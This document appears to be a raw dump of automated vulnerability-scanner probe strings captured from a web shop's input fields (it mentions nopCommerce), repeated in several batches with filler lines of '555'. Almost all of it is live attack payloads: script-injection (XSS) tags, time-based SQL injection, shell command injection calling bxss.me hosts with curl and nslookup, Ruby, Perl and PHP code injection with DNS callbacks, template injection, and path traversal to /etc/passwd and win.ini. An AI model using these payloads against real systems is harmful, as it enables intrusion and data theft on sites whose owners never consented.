Socket.gethostbyname("hityn"+"psnaodubca28c.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(115).concat(86).concat(111).concat(70)+(require'socket'
Socket.gethostbyname('hitzg'+'muvpaoytd06c7.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(119).concat(69).concat(99).concat(82)+(require'socket'
Socket.gethostbyname('hitpj'+'dmpqwoiw30842.bxss.me.')[3].to_s)
555
555
555
about-nopcommerce
xfs.bxss.me
about-nopcommerce/.
555
555
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >23CF(9118)</ScRiPt>
'"()&%<zzz><ScRiPt >23CF(9456)</ScRiPt>
5559594659
bfg1175<s1﹥s2ʺs3ʹhjl1175
bfgx1922%C0%BEz1%C0%BCz2a%90bcxhjl1922
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >23CF(9431)</ScRiPt>
555<WGSHLI>HK6BV[!+!]</WGSHLI>
555<script>23CF(9523)</script>
555<script>23CF(9627)</script>9627
555<ScR<ScRiPt>IpT>23CF(9963)</sCr<ScRiPt>IpT>
555<ScRiPt
>23CF(9652)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9941></ScRiPt>
555<isindex type=image src=1 onerror=23CF(9144)>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9072'>
555<body onload=23CF(9544)>
555<img src=//xss.bxss.me/t/dot.gif onload=23CF(9369)>
555<img src=xyz OnErRor=23CF(9727)>
555<img/src=">" onerror=alert(9039)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%32%33%43%46%289178%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\23CF(9120)\u003C/sCripT\u003E
555<ScRiPt>23CF(9931)</sCripT>
%F6<img zzz onmouseover=23CF(98341) //%F6>
555<input autofocus onfocus=23CF(9846)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(23CF(9538))}
555RYnD5
<ScRiPt >23CF(9530)</ScRiPt>
555<WBKLN9>BTVL3[!+!]</WBKLN9>
555<ifRAme sRc=9372.com></IfRamE>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<ajrAvFQ x=9106>
555<img sRc='http://attacker-9493/log.php?
555<aoOk34M<
555
555
555
555
555
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1)); waitfor delay '0:0:15' --
555
555
555
555
555-1 waitfor delay '0:0:15' --
555toT2mwIv'; waitfor delay '0:0:15' --
555vbS34pZj'); waitfor delay '0:0:15' --
555QWEZAyMe')); waitfor delay '0:0:15' --
555-1 OR 921=(SELECT 921 FROM PG_SLEEP(15))--
555-1) OR 843=(SELECT 843 FROM PG_SLEEP(15))--
555-1)) OR 38=(SELECT 38 FROM PG_SLEEP(15))--
555MQVAJELG' OR 141=(SELECT 141 FROM PG_SLEEP(15))--
555ncxaLSwd') OR 588=(SELECT 588 FROM PG_SLEEP(15))--
555mDLdDFkR')) OR 98=(SELECT 98 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@ctkTs
555
555
555
555
555
555
555
555
555
response.write(9248786*9958338)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'+response.write(9248786*9958338)+'
555
"+response.write(9248786*9958338)+"
<% response.write(9248786*9958338) %>
+response.write(9248786*9958338)'
555
555
555
555
555
echo tcmrap$()\ bkmwyz\nz^xyu||a #' &echo tcmrap$()\ bkmwyz\nz^xyu||a #|" &echo tcmrap$()\ bkmwyz\nz^xyu||a #
&echo syqnwl$()\ luqeqq\nz^xyu||a #' &echo syqnwl$()\ luqeqq\nz^xyu||a #|" &echo syqnwl$()\ luqeqq\nz^xyu||a #
555&echo jxvbqp$()\ fxsmyd\nz^xyu||a #' &echo jxvbqp$()\ fxsmyd\nz^xyu||a #|" &echo jxvbqp$()\ fxsmyd\nz^xyu||a #
|echo rfpdes$()\ qagmfo\nz^xyu||a #' |echo rfpdes$()\ qagmfo\nz^xyu||a #|" |echo rfpdes$()\ qagmfo\nz^xyu||a #
555|echo damxll$()\ zhxbgl\nz^xyu||a #' |echo damxll$()\ zhxbgl\nz^xyu||a #|" |echo damxll$()\ zhxbgl\nz^xyu||a #
(nslookup -q=cname hitccakamsgmg8f952.bxss.me||curl hitccakamsgmg8f952.bxss.me))
$(nslookup -q=cname hitvdbnjqkxjhd3620.bxss.me||curl hitvdbnjqkxjhd3620.bxss.me)
&nslookup -q=cname hitypkpuwzdofeaa7e.bxss.me&'\"`0&nslookup -q=cname hitypkpuwzdofeaa7e.bxss.me&`'
&(nslookup -q=cname hitibazbhylryce379.bxss.me||curl hitibazbhylryce379.bxss.me)&'\"`0&(nslookup -q=cname hitibazbhylryce379.bxss.me||curl hitibazbhylryce379.bxss.me)&`'
|(nslookup -q=cname hitndstvrpbqa29fd1.bxss.me||curl hitndstvrpbqa29fd1.bxss.me)
`(nslookup -q=cname hitedbbpsqvftb9866.bxss.me||curl hitedbbpsqvftb9866.bxss.me)`
;(nslookup -q=cname hitwtmyqmjtuxfc52a.bxss.me||curl hitwtmyqmjtuxfc52a.bxss.me)|(nslookup -q=cname hitwtmyqmjtuxfc52a.bxss.me||curl hitwtmyqmjtuxfc52a.bxss.me)&(nslookup -q=cname hitwtmyqmjtuxfc52a.bxss.me||curl hitwtmyqmjtuxfc52a.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitdmqhoosdmc8654d.bxss.me||curl${IFS}hitdmqhoosdmc8654d.bxss.me)
../../../../../../../../../../../../../../etc/passwd
&(nslookup${IFS}-q${IFS}cname${IFS}hithpgijbkhiu3e94e.bxss.me||curl${IFS}hithpgijbkhiu3e94e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithpgijbkhiu3e94e.bxss.me||curl${IFS}hithpgijbkhiu3e94e.bxss.me)&`'
../../../../../../../../../../../../../../windows/win.ini
555
555
file:///etc/passwd
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
${9999735+9999077}
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
555
/etc/shells
)
../../../../../../../../../../../../../../etc/shells
!(()&&!|*|*|
c:/windows/win.ini
^(#$!@#$)(()))******
bxss.me
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitqa'.'qebuxqrt42f5e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(78).chr(120).chr(90).'
".gethostbyname(lc("hitol"."vqffkngtc2dbd.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(67).chr(118).chr(73)."
gethostbyname(lc('hitas'.'zayojyuo4ba5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(86).chr(114).chr(79)
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
'"()
${@print(md5(31337))}
555'&&sleep(27*1000)*cnhdzd&&'
${@print(md5(31337))}\
555"&&sleep(27*1000)*fpixal&&"
'.print(md5(31337)).'
555'||sleep(27*1000)*bvfzyl||'
555
555"||sleep(27*1000)*zmtcyw||"
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(100).concat(88).concat(113).concat(77)+(require"socket"
Socket.gethostbyname("hitry"+"ykcqmqma9c01b.bxss.me.")[3].to_s)+"
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(119).concat(88).concat(107).concat(81)+(require'socket'
Socket.gethostbyname('hitol'+'mflegkohbe114.bxss.me.')[3].to_s)+'
555
about-nopcommerce
555
'A'.concat(70-3).concat(22*4).concat(114).concat(68).concat(103).concat(82)+(require'socket'
Socket.gethostbyname('hitiq'+'tiowgagocb43c.bxss.me.')[3].to_s)
555
555
555
555
about-nopcommerce/.
555
555
xfs.bxss.me
555
555
555
555
555
'"
<!--
555
555'"()&%<zzz><ScRiPt >PglF(9030)</ScRiPt>
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >wgIs(9418)</ScRiPt>
'"()&%<zzz><ScRiPt >PglF(9038)</ScRiPt>
555
'"()&%<zzz><ScRiPt >wgIs(9209)</ScRiPt>
5559193221
555
555
-1 OR 2+978-978-1=0+0+0+1 --
555
-1 OR 2+950-950-1=0+0+0+1
555
5559335613
-1' OR 2+460-460-1=0+0+0+1 --
bfg1271<s1﹥s2ʺs3ʹhjl1271
555
-1' OR 2+194-194-1=0+0+0+1 or 'u3I2dZhW'='
-1" OR 2+97-97-1=0+0+0+1 --
555
bfgx9918%C0%BEz1%C0%BCz2a%90bcxhjl9918
555
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >PglF(9196)</ScRiPt>
555<WAG1SQ>D3PDO[!+!]</WAG1SQ>
555<script>PglF(9825)</script>
555<script>PglF(9522)</script>9522
555<ScR<ScRiPt>IpT>PglF(9174)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>PglF(9174)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9151></ScRiPt>
555<isindex type=image src=1 onerror=PglF(9721)>
555*if(now()=sysdate(),sleep(15),0)
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9265'>
555<body onload=PglF(9133)>
555<img src=//xss.bxss.me/t/dot.gif onload=PglF(9210)>
555<img src=xyz OnErRor=PglF(9188)>
555<img/src=">" onerror=alert(9966)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%50%67%6C%46%289266%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\PglF(9431)\u003C/sCripT\u003E
555<ScRiPt>PglF(9195)</sCripT>
555
%F6<img zzz onmouseover=PglF(90971) //%F6>
555<input autofocus onfocus=PglF(9402)>
<a HrEF=http://xss.bxss.me></a>
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(PglF(9657))}
555CMB4s
<ScRiPt >PglF(9906)</ScRiPt>
555<WP7QXX>D6HT9[!+!]</WP7QXX>
555<ifRAme sRc=9318.com></IfRamE>
555<ahXmjcj x=9440>
555<img sRc='http://attacker-9995/log.php?
555<aRqt6EH<
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555-1)); waitfor delay '0:0:15' --
555
555
555-1 waitfor delay '0:0:15' --
555'"()&%<zzz><ScRiPt >WPoK(9818)</ScRiPt>
555
'"()&%<zzz><ScRiPt >WPoK(9571)</ScRiPt>
response.write(9106299*9045924)
'+response.write(9106299*9045924)+'
/../../../../../../../../../../windows/system32/BITSADMIN.exe
"+response.write(9106299*9045924)+"
555
<% response.write(9106299*9045924) %>
+response.write(9106299*9045924)'
555
5559461624
555
555
555
555
echo xtrhfd$()\ athnxf\nz^xyu||a #' &echo xtrhfd$()\ athnxf\nz^xyu||a #|" &echo xtrhfd$()\ athnxf\nz^xyu||a #
555
&echo clisrl$()\ gfwmbo\nz^xyu||a #' &echo clisrl$()\ gfwmbo\nz^xyu||a #|" &echo clisrl$()\ gfwmbo\nz^xyu||a #
555&echo ubjzpa$()\ aookro\nz^xyu||a #' &echo ubjzpa$()\ aookro\nz^xyu||a #|" &echo ubjzpa$()\ aookro\nz^xyu||a #
555
|echo obilqw$()\ wqboia\nz^xyu||a #' |echo obilqw$()\ wqboia\nz^xyu||a #|" |echo obilqw$()\ wqboia\nz^xyu||a #
555|echo ikzbfh$()\ cxlzrx\nz^xyu||a #' |echo ikzbfh$()\ cxlzrx\nz^xyu||a #|" |echo ikzbfh$()\ cxlzrx\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
(nslookup -q=cname hitztaqkeoytsf850b.bxss.me||curl hitztaqkeoytsf850b.bxss.me))
file:///etc/passwd
$(nslookup -q=cname hitprcdnntzptf73f3.bxss.me||curl hitprcdnntzptf73f3.bxss.me)
555
555
&nslookup -q=cname hitdzctpmwjqq4b68c.bxss.me&'\"`0&nslookup -q=cname hitdzctpmwjqq4b68c.bxss.me&`'
../555
&(nslookup -q=cname hithhdhdkzkfzdd1bc.bxss.me||curl hithhdhdkzkfzdd1bc.bxss.me)&'\"`0&(nslookup -q=cname hithhdhdkzkfzdd1bc.bxss.me||curl hithhdhdkzkfzdd1bc.bxss.me)&`'
555
|(nslookup -q=cname hiteavcsdkhowcc1b0.bxss.me||curl hiteavcsdkhowcc1b0.bxss.me)
555
`(nslookup -q=cname hitocftnathpn15e0c.bxss.me||curl hitocftnathpn15e0c.bxss.me)`
555
;(nslookup -q=cname hitwatuygsryfd6a0d.bxss.me||curl hitwatuygsryfd6a0d.bxss.me)|(nslookup -q=cname hitwatuygsryfd6a0d.bxss.me||curl hitwatuygsryfd6a0d.bxss.me)&(nslookup -q=cname hitwatuygsryfd6a0d.bxss.me||curl hitwatuygsryfd6a0d.bxss.me)
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitrziwgedpij99dd2.bxss.me||curl${IFS}hitrziwgedpij99dd2.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitviaugnexvnef235.bxss.me||curl${IFS}hitviaugnexvnef235.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitviaugnexvnef235.bxss.me||curl${IFS}hitviaugnexvnef235.bxss.me)&`'
555
555
555
555
555
555
555
555
555SAQPaJh2'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
${10000393+9999287}
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
)
c:/windows/win.ini
!(()&&!|*|*|
bxss.me
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555'&&sleep(27*1000)*zxfhth&&'
555"&&sleep(27*1000)*fheuce&&"
555'||sleep(27*1000)*ohyskf||'
555"||sleep(27*1000)*fhwzir||"
'.gethostbyname(lc('hityi'.'logugzyb5ddfd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(71).chr(108).chr(88).'
".gethostbyname(lc("hitrt"."mpmtuhzt85095.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(69).chr(104).chr(70)."
gethostbyname(lc('hitcf'.'uotjxwgj3094a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(86).chr(103).chr(65)
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
555
555
555Nwe4m0eH'); waitfor delay '0:0:15' --
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(113).concat(70).concat(106).concat(87)+(require"socket"
Socket.gethostbyname("hitvk"+"kbrotihh0f349.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(122).concat(88).concat(122).concat(65)+(require'socket'
Socket.gethostbyname('hitvd'+'ehqeebok9defd.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(104).concat(90).concat(101).concat(74)+(require'socket'
Socket.gethostbyname('hitkj'+'rqrnflhd2108f.bxss.me.')[3].to_s)
555
555
555
about-nopcommerce
about-nopcommerce/.
555
555
xfs.bxss.me
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >Z8oS(9436)</ScRiPt>
'"()&%<zzz><ScRiPt >Z8oS(9757)</ScRiPt>
5559190081
bfg9937<s1﹥s2ʺs3ʹhjl9937
555
-1 OR 2+709-709-1=0+0+0+1 --
-1 OR 2+690-690-1=0+0+0+1
-1' OR 2+840-840-1=0+0+0+1 --
-1' OR 2+361-361-1=0+0+0+1 or 'WGuBUanK'='
bfgx8941%C0%BEz1%C0%BCz2a%90bcxhjl8941
-1" OR 2+761-761-1=0+0+0+1 --
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
5555OaALCn6')); waitfor delay '0:0:15' --
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >Z8oS(9922)</ScRiPt>
555<WBTSON>PZ1XP[!+!]</WBTSON>
555<script>Z8oS(9005)</script>
555<script>Z8oS(9318)</script>9318
555<ScR<ScRiPt>IpT>Z8oS(9926)</sCr<ScRiPt>IpT>
555<ScRiPt
>Z8oS(9667)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9392></ScRiPt>
555*if(now()=sysdate(),sleep(15),0)
555<isindex type=image src=1 onerror=Z8oS(9075)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9887'>
555-1 OR 702=(SELECT 702 FROM PG_SLEEP(15))--
555<body onload=Z8oS(9848)>
555<img src=//xss.bxss.me/t/dot.gif onload=Z8oS(9168)>
555<img src=xyz OnErRor=Z8oS(9197)>
555<img/src=">" onerror=alert(9120)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%5A%38%6F%53%289617%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Z8oS(9065)\u003C/sCripT\u003E
555<ScRiPt>Z8oS(9462)</sCripT>
%F6<img zzz onmouseover=Z8oS(95591) //%F6>
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555<input autofocus onfocus=Z8oS(9476)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(Z8oS(9687))}
555-1) OR 385=(SELECT 385 FROM PG_SLEEP(15))--
555AeEcB
<ScRiPt >Z8oS(9465)</ScRiPt>
555<WTRFRE>OORZG[!+!]</WTRFRE>
555<ifRAme sRc=9878.com></IfRamE>
555<aEwsuwW x=9734>
555<img sRc='http://attacker-9634/log.php?
555<a7yECvV<
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555-1)) OR 221=(SELECT 221 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555ndtrBV1e' OR 610=(SELECT 610 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555
555
555La0h3FT2') OR 404=(SELECT 404 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555K1WWaDna')) OR 526=(SELECT 526 FROM PG_SLEEP(15))--
555-1)); waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555-1 waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@q7Fxd
555SBEdVQZF'; waitfor delay '0:0:15' --
555
555xpuBXMPS'); waitfor delay '0:0:15' --
555
555
555
555
555
555
555ItTtIddy')); waitfor delay '0:0:15' --
555
555-1 OR 894=(SELECT 894 FROM PG_SLEEP(15))--
555
555-1) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
555
555-1)) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
555
5556fYXRvaG' OR 364=(SELECT 364 FROM PG_SLEEP(15))--
555
5559YUAbwCN') OR 277=(SELECT 277 FROM PG_SLEEP(15))--
555
555PjNYj6nt')) OR 324=(SELECT 324 FROM PG_SLEEP(15))--
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@hbrZD
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >KE1I(9379)</ScRiPt>
555
'"()&%<zzz><ScRiPt >KE1I(9016)</ScRiPt>
555
5559534774
555
bfg7453<s1﹥s2ʺs3ʹhjl7453
555
bfgx3160%C0%BEz1%C0%BCz2a%90bcxhjl3160
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >KE1I(9401)</ScRiPt>
555
555<WT9CME>OKSXS[!+!]</WT9CME>
555<script>KE1I(9746)</script>
555<script>KE1I(9708)</script>9708
555<ScR<ScRiPt>IpT>KE1I(9590)</sCr<ScRiPt>IpT>
555<ScRiPt
>KE1I(9972)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9571></ScRiPt>
555<isindex type=image src=1 onerror=KE1I(9439)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9814'>
555<body onload=KE1I(9979)>
555<img src=//xss.bxss.me/t/dot.gif onload=KE1I(9521)>
555<img src=xyz OnErRor=KE1I(9872)>
555<img/src=">" onerror=alert(9679)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4B%45%31%49%289030%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\KE1I(9501)\u003C/sCripT\u003E
555<ScRiPt>KE1I(9346)</sCripT>
%F6<img zzz onmouseover=KE1I(96591) //%F6>
555<input autofocus onfocus=KE1I(9299)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(KE1I(9542))}
555Nkbzd
<ScRiPt >KE1I(9514)</ScRiPt>
555<WXSNZ0>96FJR[!+!]</WXSNZ0>
555<ifRAme sRc=9296.com></IfRamE>
555<at5fpU4 x=9130>
555<img sRc='http://attacker-9729/log.php?
555<aU5iJ8Q<
555'"()&%<zzz><ScRiPt >1Bof(9431)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >1Bof(9526)</ScRiPt>
555
5559048298
bfg10104<s1﹥s2ʺs3ʹhjl10104
555
bfgx4217%C0%BEz1%C0%BCz2a%90bcxhjl4217
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
dfb[[${98991*97996}]]xca
555
dfb__${98991*97996}__::.x
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<ScRiPt >1Bof(9912)</ScRiPt>
555
555<WF2DB5>I5S8F[!+!]</WF2DB5>
555
555<script>1Bof(9123)</script>
555
555<script>1Bof(9469)</script>9469
555
555<ScR<ScRiPt>IpT>1Bof(9744)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>1Bof(9949)</ScRiPt>
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9450></ScRiPt>
555
555<isindex type=image src=1 onerror=1Bof(9197)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9378'>
555
555<body onload=1Bof(9195)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=1Bof(9127)>
555
555<img src=xyz OnErRor=1Bof(9358)>
555
555<img/src=">" onerror=alert(9181)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%31%42%6F%66%289562%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\1Bof(9843)\u003C/sCripT\u003E
555
555<ScRiPt>1Bof(9954)</sCripT>
555
%F6<img zzz onmouseover=1Bof(92451) //%F6>
555
555<input autofocus onfocus=1Bof(9322)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(1Bof(9277))}
555
5557QKQ4
<ScRiPt >1Bof(9936)</ScRiPt>
555
555<WAV0C8>MJRRB[!+!]</WAV0C8>
555
555<ifRAme sRc=9889.com></IfRamE>
555
555<anf2FlJ x=9557>
555
555
555<img sRc='http://attacker-9203/log.php?
555<a5GmuNB<